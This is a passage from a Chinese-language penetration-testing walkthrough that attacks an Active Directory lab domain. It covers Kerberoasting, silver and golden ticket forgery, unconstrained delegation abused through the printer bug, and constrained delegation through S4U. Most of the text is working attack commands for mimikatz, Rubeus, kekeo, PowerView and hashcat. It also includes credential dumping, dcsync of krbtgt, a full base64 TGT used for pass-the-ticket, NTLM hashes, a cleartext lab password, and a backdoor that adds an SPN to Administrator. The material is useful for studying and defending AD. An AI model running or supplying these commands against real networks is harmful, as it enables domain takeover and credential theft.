4.需要域用户登录才能查询,因为SPN查询部分使用了LDAP协议

0x01 高效率方法

  1. 查询SPN,找到有价值的SPN,需要满足以下条件:
  2. 该SPN注册在域用户帐户(Users)下
  3. 域用户账户的权限很高
  4. 请求TGS
  5. 导出TGS
  6. 暴力破解

账户低权限时注册的SPN,后来当账户权限提高时。如下工具也检测不出来,同理高权限注册后降权,工具也检测不出来!

0x02 手工攻击实现

1.检测高权限账户

工具只能检测出SPN服务注册时用户的高低权限,若后来权限提高或者降低皆无法检测到。

(1)使用powershell模块Active Direvtory

当服务器上存在此模块时(域控一般安装)

powershell.exe -exec bypass -Command "& {Import-Module .\ctiveDirectory;get-aduser -filter {AdminCount -eq 1 -and (servicePrincipalName -ne 0)} -prop * |select name,whencreated,pwdlastset,lastlogon}"

当服务其上没有AD模块时,加载dll文件来执行。 win8无法执行

powershell.exe -exec bypass -Command "& {Import-Module .\Microsoft.ActiveDirectory.Management.dll;get-aduser -filter {AdminCount -eq 1 -and (servicePrincipalName -ne 0)} -prop * |select name,whencreated,pwdlastset,lastlogon}"

DLL下载链接

https://codeload.github.com/3gstudent/test/zip/master
https://github.com/samratashok/ADModule

(2)使用PowerView

powershell.exe -exec bypass -Command "& {Import-Module .\PowerView.ps1; Get-NetUser -spn -AdminCount|Select name,whencreated,pwdlastset,lastlogon }"

下载链接

https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

(3)使用kerberoast工具

powershell

powershell.exe -exec bypass -Command "& {Import-Module .\GetUserSPNs.ps1;  }"

下载链接:

https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.ps1

vbs

cscript GetUserSPNs.vbs

下载链接:

https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.vbs

2.请求高权限账户的票据

在域机器win7上执行

(1)请求指定TGS
在powershell中使用如下命令获取票据(2008不行)

powershell.exe -exec bypass -Command "& {$SPNName = 'VNC/WIN7.hacke.testlab'; Add-Type -AssemblyNAme System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $SPNName }"

$SPNName = 'VNC/WIN7.hacke.testlab'
Add-Type -AssemblyNAme System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $SPNName


(2)请求所有TGS

执行完(1)第一个后第二个才能执行
需要powershell下执行

powershell.exe -exec bypass -Command "& {Add-Type -AssemblyName System.IdentityModel  }"

setspn.exe -q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

可以看到获取到了所有的票据

3.导出票据

使用mimikatz.exe

kerberos::list /export

4.破解票据

在这里之所以能够进行破解,是因为我们后来加入的那些服务加密算法。默认是RC4的,而不是原有服务那种AES-256-CTS-HMAC-SHA1-96 !

参考链接:

https://mp.weixin.qq.com/s/88GqLe63YIBbTkQH9EIXcg

在这里破解方式我收集了两种

(1) 使用tgsrepcrack.py

pip install requests-kerberos,kerberos-sspi
import kerberos 改成 import kerberos_sspi as kerberos

但是这里的模块我没安装成功就没尝试这个操作

下载链接

https://github.com/nidem/kerberoast/blob/master/tgsrepcrack.py

(2) 使用kirbi2john.py转格式

这里和(1)中使用的格式不同,因此可以使用hashcat john 工具来进行爆破票据

在这里进行转换

python kirbi2john.py *.kirbi > johnkirb.txt

在这里笔者pip包没有安装成功,因此没有截图。这两种失败没事,接下来的自动化导出直接替代了上面的所有!

0x03 全自动化导出

在这里使用 Empire 中的 Invoke-Kerberoast.ps1 脚本,导出hashcat格式的密钥。且它会自动选择所有的user Hash!

powershell.exe -exec bypass -Command "& {Import-Module .\Invoke-Kerberoast.ps1;Invoke-kerberoast -outputformat hashcat |fl > hash.txt}"

0x04 暴力破解

将上述的数据中提取出hashcat可爆破的部分,放入hash.txt

在这里使用hashcat进行破解

hashcat -m 13100 hash.txt password.list -o found.txt --force

0x05 Kerberoasting后门利用

当我们获取到有权注册SPN的域账号时,或者拿到了域控。我们就可以为指定的域用户添加一个SPN。这样可以随时获得该用户的TGS,从而经过破解后可以获得明文口令。

如为添加管理员Administrator添加VNC/WIN-Q2JR4MURGS0.hacke.testlab

setspn.exe -U -A VNC/WIN-Q2JR4MURGS0.hacke.testlab Administrator


白银票据

0x00 利用条件

攻击者在使用Silver Ticket对内网进行攻击时,需要掌握以下信息:

  • 域名
  • 域SID
  • 目标服务器的FQDN
  • 可利用的服务
  • 服务账号的NTLM Hash
  • 需要伪造的用户名

0x01 实验环境

实验1:使用Silver Ticket伪造CIFS服务权限

CIFS服务通常用于Windows主机之间的文件共享。

在本实验中,首先使用当前域用户权限,查询对域控制器的共享目录的访问权限。

在域控制器中输入如下命令,使用mimikatz获取服务账号的NTLM Hash

使用log参数以便复制散列值

mimikatz log "privilege::debug" "sekurlsa::logonpasswords"

机器账号的NTLM Hash

f2abe578cdedfbb0dc5bf4249145c8dd

注意,这里使用的是共享服务账号,所以使用的是WIN-Q2JR4MURGS0$而非administrator

我们继续获取其他信息

域名(注入时需要写成小写)

域SID

whoami /all >123.txt  //注意要去掉-500

WIN-Q2JR4MURGS0$
domain:hacke.testlab
SID:S-1-5-21-3502871099-3777307143-1257297015

然后,在命令行环境下输入如下命令,清空当前系统中的票据和域成员的票据,防止其他票据干扰。

klist purge
kerberos::purge

使用mimikatz生成伪造的 Silver Ticket ,在之前不能访问域控制器共享目录的机器输入如下命令:

kerberos::golden /domain:域名 /sid:SID /target:域全称 /service:要访问的服务 /rc4:NTLM /user:username /ptt

kerberos::golden /domain:HACKE.TESTLAB /sid:S-1-5-21-3502871099-3777307143-1257297015 /target:WIN-Q2JR4MURGS0.hacke.testlab /service:cifs /rc4:f2abe578cdedfbb0dc5bf4249145c8dd /user:test /ptt

或者
mimikatz "kerberos::golden /domain:HACKE.TESTLAB /sid:S-1-5-21-3502871099-3777307143-1257297015 /target:WIN-Q2JR4MURGS0.hacke.testlab /service:cifs /rc4:f2abe578cdedfbb0dc5bf4249145c8dd /user:test /ptt"

实验2 访问域控上的"LDAP"服务

在本实验中,使用dcsync从域控制器中获取指定用户的账号和密码散列,如krbtgt

输入如下命令,测试以当前权限是否可以使用dcsync与域控制器进行同步

lsadump::dcsync /dc:WIN-Q2JR4MURGS0.hacke.testlab /domain:hacke.testlab /user:krbtgt

向域控制器获取krbtgt的密码散列值失败,说明以当前权限不能进行dcsync操作。

这时候可以直接修改上面的命令,将服务修改成ldap即可!

kerberos::golden /domain:HACKE.TESTLAB /sid:S-1-5-21-3502871099-3777307143-1257297015 /target:WIN-Q2JR4MURGS0.hacke.testlab /service:cifs /rc4:f2abe578cdedfbb0dc5bf4249145c8dd /user:test /ptt

再次访问即可!

silver Ticket 还可以用于伪造其他服务,例如创建和修改计划任务、使用WMI对远程主机执行命令,使用powershell对远程主机进行管理等

服务账号的NTLM Hash 这里用的是机器账号的NTLM Hash ,说是共享服务账号
需要伪造的用户名,这里需要是域内的用户

参考链接:

https://www.freebuf.com/articles/network/245872.html
https://www.cnblogs.com/wuxinmengyi/p/11769233.html
https://pureqh.top/?p=4358
https://www.cnblogs.com/bmjoker/p/10355979.html
https://www.anquanke.com/post/id/172900#h2-6
https://www.cnblogs.com/bmjoker/p/10355979.html

S4U

前言

域委派是指将域内用户的权限委派给服务账户,使得服务账号能够以用户的权限在域内展开活动。

委派主要分为非约束委派 (Unconstrained delegation)和约束委派 Constrained delegation)与基于资源的约束委派 (Resource Based Constrained Delegation)

非约束委派

原理

当user访问service1时,如果service1的服务账号开启了unconstrained delegation(非约束委派),则当user访问service1时会将user的TGT发送给service1并保存在内存中已备下次重用,然后service1就可以利用这张TGT以user的身份去访问域内的任何服务(任何服务是指user能够访问的服务)了

非约束委派的请求过程(图来自微软手册):

上图的kerberos请求描述分为如下步骤:

1. 用户向`KDC`发送`KRB_AS_REQ`消息请求可转发的`TGT1`。

2. KDC在`KRB_AS_REP`消息中返回`TGT1`。

3. 用户根据步骤2中的TGT1请求转发TGT2。

4. KDC在KRB_TGS_REP消息中为user返回TGT2。

5. 用户使用步骤2中返回的TGT1向KDC请求Service1的ST(Service Ticket)

6. TGS在KRB_TGS_REP消息中返回给用户service1的ST。

7. 用户发送KRB_AP_REQ消息请求Service1,KRB_AP_REQ消息中包含了TGT1和Service1的ST、TGT2、TGT2的SessionKey

8. service1使用用户发送过来的的TGT2,并以KRB_TGS_REQ的形式将其发送到KDC,以用户的名义请求service2的ST。

9. KDC在KRB_TGS_REP消息中返回service2到service1的ST,以及service1可以使用的sessionkey。ST将客户端标识为用户,而不是service1。

10. service1通过KRB_AP_REQ以用户的名义向service2发出请求。

11. service2响应service1的请求。

12. 有了这个响应,service1就可以在步骤7中响应用户的请求。

13. 这里的TGT转发委派机制没有限制service1使用的TGT2是来自哪个服务,所以service1可以以用户的名义向KDC索要任何其他服务的票证。

14. KDC返回步骤13中请求的ST

15-16. service1以用户的名义来请求其它服务

注:TGT1(forwardable TGT) 用于访问Service1,TGT2(forwarded TGT)用于访问Service2

实验环境

操作环境

  • 域:hacke.testlab
  • 域控:win 2012 R2 主机名 WIN-Q2JR4MURGS0 IP 192.168.60.1
  • 域内主机:win7 主机名 WIN7 IP 192.168.60.50

非约束委派信息搜集

PowerSploit下的PowerView.ps1脚本

寻找设置了非约束委派的账号

powershell.exe -exec bypass -Command "& {Import-Module .\PowerView.ps1;Get-NetUser -Unconstrained -Domain hacke.testlab | select name }"

寻找设置了非约束委派的主机

powershell.exe -exec bypass -Command "& {Import-Module .\powerview.ps1;Get-NetComputer -Unconstrained -Domain hacke.testlab }"

pass:域控默认设置为非约束委派

使用ADFind.exe查找

寻找设置了非约束委派的账号

AdFind.exe -b "DC=hacke,DC=testlab" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName

寻找设置了非约束委派的主机

AdFind.exe -b "DC=hacke,DC=testlab" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName

pass:域控默认设置为非约束委派

非约束委派攻击

在这里首先将WIN7 机器设置为非约束委派权限

每次实验之前清除票据

高权限机器主动访问我们

所需权限:
非约束主机的管理权权限,需要导出内存中的票据

首先在域控上访问我们的WIN7,这里只要是高权限账户登录任意域内一台机器访问即可。

这时候win7的lsass.exe内存中就会有域用户test的TGT票据。我们在win7上用管理员运行mimikatz,命令如下

privilege::debug
sekurlsa::tickets /export

设置非约束和约束的凭证区别

在这里尝试访问域控判断是否成功

使用mimikatz将这个票据导入内存中,然后访问域控
导入票据

kerberos::ptt [0;8c20d]-2-0-60810000-Administrator@krbtgt-HACKE.TESTLAB.kirbi

这时候就成功了

这种方法除了欺骗他人之外,最常用的就是在IIS服务器上面的应用。因为很多web服务器开启了非委派,这样可以存储非常多的TGT。高权限导出即可!

使用打印机服务BUG来访问我们

在第一种中,其实利用起来难度不小。让要高权限用户来访问我们的非约束主机其实利用起来不太好,所以这里我们还可以使用打印机的BUG,来让它以高权限用户访问非约束主机。

所需权限:
非约束主机的管理权限,需要导出内存中的票据。
有两种方式,1.system权限+其他方式获取的域sid 2.两个会话,一个system/administrator 一个域内权限

(1)system权限+其他方式获取的域sid

首先使用工具Rubeus.exe 1.5.0 监听来自WIN-Q2JR4MURGS0 Event ID为4624事件。每隔一秒监听一次来自WIN-Q2JR4MURGS0的登录,然后将其写到文件夹里

Rubeus.exe monitor /interval:1 /filteruser:WIN-Q2JR4MURGS0$ > C:\user.txt
psexec.exe -s cmd /c "Rubeus.exe monitor /interval:1 /filteruser:WIN-Q2JR4MURGS0$ > C:\user.txt " -arguments

想使用SpoolSampler需要访问域内权限,如果使用administrator执行。会出现SMB认证失败的情况!

因此这里需要提升到system权限,或者在域用户下执行。在这里使用psexec 单条命令提到system权限,去认证执行查询操作

psexec.exe -s cmd /c "C:\Users\Administrator\Desktop\tool\tools--main\SpoolSample\SpoolSamplerNET.exe WIN7 WIN-Q2JR4MURGS0" -arguments //前当前主机名  后域控主机名  不同工具不同写法

下载链接

https://github.com/shigophilo/tools-

然后根据不同的系统版本选择适合的请求工具,在这里笔者环境为WIN7。因此使用SpoolSamplerNET.exe

SpoolSamplerNET.exe WIN7 WIN-Q2JR4MURGS0   //前本机  后域控   不同工具位置不同

随后在Rubeus.exe指定的文件夹下就出现了信息

在这里想要利用还需要获取域SID,这里我们可以通过窃取凭证或者在其他机器上拿到。因为凭证窃取AccessToken 需要交互,所以这里直接在其他域机器上拿到了sid

S-1-5-21-3502871099-3777307143-1257297015

凭证窃取

https://blog.csdn.net/qq_45521281/article/details/105941102

根据其他人的测试,这里可以使用mimikatz从内存中导出票据。

但是我这里不行,这里并没有来自域控的票据

因此在这里需要使用Rubeus导入base64格式的票据,首先将我们监听得到的base64数据继续整理

doIFkDCCBYygAwIBBaEDAgEWooIEijCCBIZhggSCMIIEfqADAgEFoQ8bDUhBQ0tFLlRFU1RMQUKiIjAgoAMCAQKhGTAXGwZrcmJ0Z3QbDUhBQ0tFLlRFU1RMQUKjggRAMIIEPKADAgESoQMCAQWiggQuBIIEKmTwwM+czaSqrH3mlRCvLCSVu5YMlVoClCg2VPTeygORXwiA9EoHHQ1bg8v0VsXns8qJDnufDFxtqiyiui3r99842kvxVaZHKip7n4MUvOuvf/CBGmLi4vP3TgefWP9HLk1WCEhuguGh/XhaBxhQk8AXad47UFryIo/9ZHg2rn4RaUFd3/X6EzPiIffLUzvJsPillUBov7jgsfdlsDS5YLBdpTBRdoorY7vh1MPkeDd2yW0BoPdeTn4s+iJfGUuBmJkHpwKkpNZbMevb7dxC6xnI4zeMFZdL6DXxGuLxhkQTdz54R6JtN4yYbAdgTcjDX/51ox5hU3bLRLeCDdvlTHfTBGnGKAejC47Rg37XPo/GbcpNJ9bLhODEgI0zQpQuE5edEsbD78dFAusFeV7UtT45Nc6chTH7KYWcC8kbjmWvjO9pv6wTSAEqPM4MnOgXi/3BwUEIfFnQEGQoVs7Qhz6auHkLwqd4M6hK7PXGoAzGxiOmYUqu2ZiEil3qaECQMtAfw13bc3/DHf9gKpvrjnpEeXiwrEyq5fKSWzmzQsIKTc8P0Vsbn1h5ZucWPMWFK6rPFgqPhU7dhUjxmfbC0VIu2qKziHSheTSkHOBzP6jjRnLwVaE1QhX9pJz7obM0SSXXfdM9Dx385QNhcuPZm1OK6Z5Zx3wxDj7ABfA+rQmie06Y6Xk59tYFKvoMruftMwFtg1jQ0FahT1afIqO8zJDUFV94KOpK0/iNY7q3cAomZpZOnrwuFW+CetguklT8RcKcZS4KWKG3BvrZDVINjg0a8NjR86N3hWulOBmO6daaHQNSyUVEityjf+LdKqAes97zOKT+BqLks+d15MLU/4Rks5vwvRowlbpnj97TrnVXgwexOVeMGfHv5IiunXyRDcgsO3mgj/q0d8BcBTj07oB7DkxgSdNSX1M02MrnPK2fW/HL1CBpFvfFYGDBOngzSy27CtbELzhOFuDQl9P1CPKGSYBG5oUIyENu201h1jFB2+5Z2kxVbiEAJ41gVx0h9K9i93ofpCcxPLJq7ZB8R/7PcZ9vnIBjku8cTXHU96OmWDfL+3SqdRW8thzFZM3YWkKjnUUQM9k2Aquq7s03aCq1iMHGFjscmPH61oGffIFFHsDK7EuD0+b9ioOumyR6Wl38sLzayjyv7Y4tzCy+KYmPXMZKMrbgh8/QG3ldTg46aEbNzHuYzPVCneNChEtLDXoI9Ug5wHkzCo4HHB/w/heBYI3Iw0TBV04GlATybyaoSiqOMda0LSXgcz+kYPZpRgE3WhD+rSBTib7N2Rol/cY+dQchHBSQ8VZ4LtdkM2h4RAVsLda5XyM3Cav4N5mRakataR0/BM5hlt6WKecLDEi/A/Bzlth9/3pont4OboTVR6jMMu3gq+mtnfMXflZu2vjTq7LK3QOR3TGjgfEwge6gAwIBAKKB5gSB432B4DCB3aCB2jCB1zCB1KArMCmgAwIBEqEiBCA0NJed+xsActh6oKzxJ16njtYZO4TvhQ62fdwDjzSAdqEPGw1IQUNLRS5URVNUTEFCoh0wG6ADAgEBoRQwEhsQV0lOLVEySlI0TVVSR1MwJKMHAwUAYKEAAKURGA8yMDIwMTIwOTEzMzEwMlqmERgPMjAyMDEyMDkyMzMxMDBapxEYDzIwMjAxMjE2MTMzMTAwWqgPGw1IQUNLRS5URVNUTEFCqSIwIKADAgECoRkwFxsGa3JidGd0Gw1IQUNLRS5URVNUTEFC

这里需要使用base64格式导入

Rubeus35.exe ptt /ticket:doIFkDCCBYygAwIBBaEDAgEWooIEijCCBIZhggSCMIIEfqADAgEFoQ8bDUhBQ0tFLlRFU1RMQUKiIjAgoAMCAQKhGTAXGwZrcmJ0Z3QbDUhBQ0tFLlRFU1RMQUKjggRAMIIEPKADAgESoQMCAQWiggQuBIIEKmTwwM+czaSqrH3mlRCvLCSVu5YMlVoClCg2VPTeygORXwiA9EoHHQ1bg8v0VsXns8qJDnufDFxtqiyiui3r99842kvxVaZHKip7n4MUvOuvf/CBGmLi4vP3TgefWP9HLk1WCEhuguGh/XhaBxhQk8AXad47UFryIo/9ZHg2rn4RaUFd3/X6EzPiIffLUzvJsPillUBov7jgsfdlsDS5YLBdpTBRdoorY7vh1MPkeDd2yW0BoPdeTn4s+iJfGUuBmJkHpwKkpNZbMevb7dxC6xnI4zeMFZdL6DXxGuLxhkQTdz54R6JtN4yYbAdgTcjDX/51ox5hU3bLRLeCDdvlTHfTBGnGKAejC47Rg37XPo/GbcpNJ9bLhODEgI0zQpQuE5edEsbD78dFAusFeV7UtT45Nc6chTH7KYWcC8kbjmWvjO9pv6wTSAEqPM4MnOgXi/3BwUEIfFnQEGQoVs7Qhz6auHkLwqd4M6hK7PXGoAzGxiOmYUqu2ZiEil3qaECQMtAfw13bc3/DHf9gKpvrjnpEeXiwrEyq5fKSWzmzQsIKTc8P0Vsbn1h5ZucWPMWFK6rPFgqPhU7dhUjxmfbC0VIu2qKziHSheTSkHOBzP6jjRnLwVaE1QhX9pJz7obM0SSXXfdM9Dx385QNhcuPZm1OK6Z5Zx3wxDj7ABfA+rQmie06Y6Xk59tYFKvoMruftMwFtg1jQ0FahT1afIqO8zJDUFV94KOpK0/iNY7q3cAomZpZOnrwuFW+CetguklT8RcKcZS4KWKG3BvrZDVINjg0a8NjR86N3hWulOBmO6daaHQNSyUVEityjf+LdKqAes97zOKT+BqLks+d15MLU/4Rks5vwvRowlbpnj97TrnVXgwexOVeMGfHv5IiunXyRDcgsO3mgj/q0d8BcBTj07oB7DkxgSdNSX1M02MrnPK2fW/HL1CBpFvfFYGDBOngzSy27CtbELzhOFuDQl9P1CPKGSYBG5oUIyENu201h1jFB2+5Z2kxVbiEAJ41gVx0h9K9i93ofpCcxPLJq7ZB8R/7PcZ9vnIBjku8cTXHU96OmWDfL+3SqdRW8thzFZM3YWkKjnUUQM9k2Aquq7s03aCq1iMHGFjscmPH61oGffIFFHsDK7EuD0+b9ioOumyR6Wl38sLzayjyv7Y4tzCy+KYmPXMZKMrbgh8/QG3ldTg46aEbNzHuYzPVCneNChEtLDXoI9Ug5wHkzCo4HHB/w/heBYI3Iw0TBV04GlATybyaoSiqOMda0LSXgcz+kYPZpRgE3WhD+rSBTib7N2Rol/cY+dQchHBSQ8VZ4LtdkM2h4RAVsLda5XyM3Cav4N5mRakataR0/BM5hlt6WKecLDEi/A/Bzlth9/3pont4OboTVR6jMMu3gq+mtnfMXflZu2vjTq7LK3QOR3TGjgfEwge6gAwIBAKKB5gSB432B4DCB3aCB2jCB1zCB1KArMCmgAwIBEqEiBCA0NJed+xsActh6oKzxJ16njtYZO4TvhQ62fdwDjzSAdqEPGw1IQUNLRS5URVNUTEFCoh0wG6ADAgEBoRQwEhsQV0lOLVEySlI0TVVSR1MwJKMHAwUAYKEAAKURGA8yMDIwMTIwOTEzMzEwMlqmERgPMjAyMDEyMDkyMzMxMDBapxEYDzIwMjAxMjE2MTMzMTAwWqgPGw1IQUNLRS5URVNUTEFCqSIwIKADAgECoRkwFxsGa3JidGd0Gw1IQUNLRS5URVNUTEFC

在导入成功之后,我们就可以尝试获取域控的krbtgt hash了

mimikatz.exe "lsadump::dcsync /domain:hacke.testlab /all /csv"

在这里开始制作黄金票据,需要使用sid。在这里通过其他机器获取到sid

S-1-5-21-3502871099-3777307143-1257297015

使用mimikatz制作ticket.kirbi 票据

kerberos::golden /admin:Administrator /domain:hacke.testlab /sid:S-1-5-21-3502871099-3777307143-1257297015 /krbtgt:2e1c1d8ccc005ba4da4af2adeb72dd39 /ptt

这时候我们就可以尝试访问域控了!

(2) 两个会话,一个system/administrator 一个域内权限

这里其实和之前那个一样,只不过可以通过域内权限获取sid而已!

约束委派

原理

由于非约束委派的不安全性,微软在windows service 2003中引入了约束委派,对kerberos协议进行了扩展,引入了S4U,其中S4U支持两个子协议:S4U2Self和S4U2proxy。这两个协议可以代替任何用户从KDC请求票据。S4U2self可以代表自身请求对其自身的kerberos服务票据(ST);S4U2proxy可以以用户名义请求其他服务的ST,约束委派就限制了S4U2proxy扩展的范围。

注:其中步骤1-4代表S4U2Self请求的过程,步骤5-10代表S4U2proxy的请求过程

上述请求的文字描述:

1. 用户向service1发出请求。用户已通过身份验证,但service1没有用户的授权数据。通常,这是由于身份验证是通过Kerberos以外的其他方式验证的。

2. 通过S4U2self扩展以用户的名义向KDC请求用于访问service1的ST1。

3. KDC返回给Service1一个用于用户验证Service1的ST1,该ST1可能包含用户的授权数据。

4. service1可以使用ST中的授权数据来满足用户的请求,然后响应用户。
注:尽管S4U2self向service1提供有关用户的信息,但S4U2self不允许service1代表用户发出其他服务的请求,这时候就轮到S4U2proxy发挥作用了

5. 用户向service1发出请求,service1需要以用户身份访问service2上的资源。

6. service1以用户的名义向KDC请求用户访问service2的ST2

7. 如果请求中包含PAC,则KDC通过检查PAC的签名数据来验证PAC ,如果PAC有效或不存在,则KDC返回ST2给service1,但存储在ST2的cname和crealm字段中的客户端身份是用户的身份,而不是service1的身份。

8. service1使用ST2以用户的名义向service2发送请求,并判定用户已由KDC进行身份验证。

9. service2响应步骤8的请求。

10. service1响应用户对步骤5中的请求。

约束配置

想要配置委派,首先需要将账号绑定SPN服务。主机账号默认加入域时会绑定几个默认的SPN,而域账号则需要通过spn命令来设置。在这里不演示如何配置约束委派。

约束委派信息搜集

Empire下的powerview.ps1脚本

配置了约束委派的服务域账号

powershell.exe -exec bypass -Command "& {Import-Module .\powerview.ps1;Get-DomainUser -TrustedToAuth -Domain hacke.testlab | select name }"

配置了约束委派的服务机器账号

powershell.exe -exec bypass -Command "& {Import-Module .\powerview.ps1;Get-DomainComputer -TrustedToAuth -Domain hacke.testlab | select name}"

ADFind

域用户服务账号以及对应的委派对象

AdFind.exe -b "DC=hacke,DC=testlab" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto

主机机器服务账户以及对应的委派对象

AdFind.exe -b "DC=hacke,DC=testlab" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto

约束资源委派攻击

域用户服务账号和主机服务账号,同样可以获取伪造高权限对应服务票据。

使用域账号服务凭证获取

域用户服务账号:weipai
域用户服务账号密码:QWE123!@#

通过Empire下的powerview.ps1脚本查找约束委派账号

powershell.exe -exec bypass -Command "& {Import-Module .\powerview.ps1;Get-DomainUser -TrustedToAuth -Domain hacke.testlab | select name }"

但是这里还需要知道这两个用户委派的是SPN服务,使用AdFind.exe发现域用户的委派spn对象

AdFind.exe -b dc=hacke,dc=testlab -f "(&(objectCategory=user)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=16777216))" msDS-AllowedToDelegateTo

在这里可以看到委派的SPN对象,这里weipai域用户服务账号委派的是域控的445权限。因此这里伪造尝试访问域控的445。

首先需要伪造S4U,这里需要获取weipai域账号的明文密码。

使用kekeo请求该用户的TGT

tgt::ask /user:weipai /domain:hacke.testlab /password:QWE123!@# /ticket:test.kirbi

当破解不出明文密码时,还可以使用NTLM hash!

tgt::ask /user:weipai /domain:hacke.testlab /NTLM:b4f27a13d0f78d5ad83750095ef2d8ec

在这里获取到了访问服务本身的tgt票据:

TGT_weipai@HACKE.TESTLAB_krbtgt~hacke.testlab@HACKE.TESTLAB.kirbi

随后使用这张可转发的TGT票据去伪造s4u请求以administrador用户权限访问SPN委派服务

tgs::s4u /tgt:TGT_weipai@HACKE.TESTLAB_krbtgt~hacke.testlab@HACKE.TESTLAB.kirbi /user:Administrator@hacke.testlab /service:cifs/WIN-Q2JR4MURGS0.hacke.testlab

S4U2Self获取到的ST1以及S4UProxy获取到的WIN-Q2JR4MURGS0 CIFS服务的ST2会保存在目录下

然后我们使用mimikatz将ST2导入当前会话即可

kerberos::ptt TGS_Administrator@hacke.testlab@HACKE.TESTLAB_cifs~WIN-Q2JR4MURGS0.hacke.testlab@HACKE.TESTLAB.kirbi

没导入前无法访问域控WIN-Q2JR4MURGS0 CIFS服务

dir \\WIN-Q2JR4MURGS0\C$

导入后则可以访问

使用机器账户服务凭证申请

AdFind发现主机的委派SPN对象

AdFind.exe -b dc=hacke,dc=testlab -f "(&(objectCategory=computer)(objectClass=computer)(userAccountControl:1.2.840.113556.1.4.803:=16777216))" msDS-AllowedToDelegateTo

WIN8$的NTLM如下

[00000003] Primary
     * Username : WIN8$
     * Domain   : HACKE
     * NTLM     : 7b335709cb4c692de6cd42b328fe8b1b
     * SHA1     : a3903dbf45c7b12186eec1b430f74fa3de7a4051

在这里也可以使用机器账户委派,需要生成一个机器账户的票据。因为机器账户的密码成不规则,所以在这里使用ntlm格式去生成。使用kekeo去生成票据

tgt::ask /user:WIN8$ /domain:hacke.testlab /NTLM:7b335709cb4c692de6cd42b328fe8b1b

随后使用这张"服务票据"去进行S4U阶段的伪造

tgs::s4u /tgt:TGT_WIN8$@HACKE.TESTLAB_krbtgt~hacke.testlab@HACKE.TESTLAB.kirbi /user:Administrator /service:cifs/WIN-Q2JR4MURGS0.hacke.testlab

在没有导入之前访问域控的cifs服务

在这里使用mimikaze导入

kerberos::ptt TGS_Administrator@HACKE.TESTLAB_cifs~WIN-Q2JR4MURGS0.hacke.testlab@HACKE.TESTLAB.kirbi

在其他未设置约束委派的机器上,使用WIN8$机器账户的凭证发起请求。也可以获取可转发的ST票据。

额外的知识点

服务账号的区分

在文章说到的:
(1)注:在Windows系统中,只有服务账号和主机账号的属性才有委派功能,普通用户默认是没有的
https://xz.aliyun.com/t/7217#toc-1
(2) 在一个域中只有服务账号才有委派功能,使用如下命令将ghtwf01设为服务账号
https://xz.aliyun.com/t/7517#toc-3

1、2存在悖论,根据2中的意思是只要绑定SPN服务就为服务账号。而1中则将能够委派的账号分为服务账号和主机账号。但是在加入域的主机账号已经自动绑定了SPN服务成为了2中的服务账号。

因此服务账号可分为域用户服务账号、机器服务账号

在这里主机账号、机器账号通过文章阅读在利用上没有什么差别,但是在其他地方我不肯定。

申请凭证的根源

约束委派中,发起请求的服务。在灵腾实验室中是用主机机器服务账号来进行演示的,在先知的文章中是使用域成员服务账号来演示的!在笔者一开始理解中,以为约束和非约束一样都是需要用户来访问主机机器服务账号所登录的机器才能成功。

但看了先知的文章发现没有提及主机服务账号设置委派进行约束攻击,导致我非常的疑惑。且那时候没有搞明白一个点,到底是谁,哪个服务去发起的请求。是设置主机机器服务账号的机器本身去申请的吗?是设置了域成员服务账号所登录的主机去申请的吗?

因此在人家的实验过程中,实在理解不了使用设置委派服务的账号密码去申请TGT这一过程。因为在当时我所看的大部分文章都是互相抄袭,没有委派阶段同时实验域服务和主机服务的过程!但是在我阅读很多次以后,我明确了一个观点!所谓service1服务 伪造用户请求service2,其实就是使用设置委派的账号生成一个TGT,从而这个TGT就代表了service1服务! 从而接下来的过程就变得非常透彻了,使用这个tgt去申请S4U过程就变得很好理解了!

非约束和约束委派总结

在非约束委派种,只有非约束委派的主机机器服务账户才起作用。而约束委派则是域服务账户和主机机器服务账户都可以起作用!并且他们使用的信息搜集都是使用ldap协议去查询某个键值。

基于资源的约束委派 RBCD

在这里主要参考了A-Team的文章"微软不认的“0day”之域内本地提权-烂番茄(Rotten Tomato)",在略结合自己的一些实践来写。

原理

基于资源的约束委派是一种允许自己去设置哪些账户委派给自己的约束委派,它和前面两种不同的地方就是前者是由域控上的高权限账户设置的,而且则可以自己指定。

传统的约束委派是"正向的",通过修改服务A属性"msDS-AllowedToDelegateTo",添加服务B的SPN(Service Prinvice Name),设置约束委派对象(服务B),服务A便可以模拟用户向域控制器请求服务B以获得服务票据(TGS)来使用服务B的资源。

而基于资源的约束委派则相反,通过修改服务B属性"msDS-AllowedToActOnBehalfOfOtherIdentity",添加服务A的SPN,达到让服务A模拟用户访问B资源的目的。

实验环境

域控 192.168.60.1
WIN7 192.168.60.3
WIN8 192.168.60.2

使用CS、MSF进行非交互式实验

首先模拟上线域内成员

工具事先已经上传到机器当中

信息搜集

因为是win7机器,所以在这里使用v3.5环境编译的EXE进行信息搜集

shell  C:\Users\test\Desktop\CreatorSIDQuery\v3.5\CreatorSIDQuery.exe > C:\Users\test\Desktop\CreatorSIDQuery\v3.5\user.txt

随后使用命令读取查看

shell type C:\Users\test\Desktop\CreatorSIDQuery\v3.5\user.txt

可以在这里看到WIN8、WIN7机器账号都是由test域账号加入到hacke.testlab域当中的!之所以说是机器账号而不直接说WIN8、WIN7主机,是因为使用test域普通账号创建的机器账号也会显示在这里!

但是在我的实验环境中目前没有用test创建机器账户,因此这里WIN8、WIN7都是主机。我们可以通过ping的方式找到对应的IP。

也就是说我们可以通过目前的test域普通账号,拿到WIN7 WIN8两台机器的system权限

创建接受委派的机器用户

根据委派的规则,我们需要一个SPN服务账户来接受委派。但是我们目前只有域内用户test的凭证。这个时候该怎么办呢?

